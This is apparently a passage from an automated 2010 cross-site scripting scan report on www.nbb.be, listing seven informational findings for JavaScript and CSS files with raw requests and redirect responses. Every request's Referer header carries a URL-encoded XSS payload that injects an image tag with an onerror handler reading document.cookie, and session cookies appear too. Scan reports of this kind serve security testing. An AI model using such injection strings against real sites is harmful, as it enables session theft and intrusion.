3.13. http://www.nbb.be/pub/appdata/js/tabber.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/appdata/js/tabber.js

Request

GET /pub/appdata/js/tabber.js HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106934267944&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.14. http://www.nbb.be/pub/appdata/js/tooltip.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/appdata/js/tooltip.js

Request

GET /pub/appdata/js/tooltip.js HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106934267946&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.15. http://www.nbb.be/pub/appdata/styles/home.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/appdata/styles/home.css

Request

GET /pub/appdata/styles/home.css HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106934267936&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.16. http://www.nbb.be/pub/appdata/styles/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/appdata/styles/print.css

Request

GET /pub/appdata/styles/print.css HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106934267934&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.17. http://www.nbb.be/pub/appdata/styles/printhome.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/appdata/styles/printhome.css

Request

GET /pub/appdata/styles/printhome.css HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106934267942&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.18. http://www.nbb.be/pub/appdata/styles/pub.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/appdata/styles/pub.css

Request

GET /pub/appdata/styles/pub.css HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106933588093&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

3.19. http://www.nbb.be/pub/appdata/styles/tabs.css  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbb.be
Path:   /pub/appdata/styles/tabs.css

Request

GET /pub/appdata/styles/tabs.css HTTP/1.1
Host: www.nbb.be
Proxy-Connection: keep-alive
Referer: http://www.nbb.be/pub/06_00_00_00_00/06_03_01_00_00/07_02_01_00_00.htm?%00d5ce2%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eea3a5180a62=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ytozkvukdfgimxbjc51pf3md; BIGipServerwco_publicweb=706521280.20480.0000; TSf90149=f3c1907732d442d35b62e8918bb2bb044653097ae2a0717e4d1e1c38

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache
Content-Length: 223

<html>
<body>
<script type="text/javascript">
window.location = "http://www.nbb.be/ErrorPages/NotAvailable.aspx?errorid=12265917106934267940&AppName=PublicWebsite&homepage=http://www.nbb.be";
</sc
...[SNIP]...

Report generated by XSS.CX at Fri Dec 31 12:13:35 CST 2010.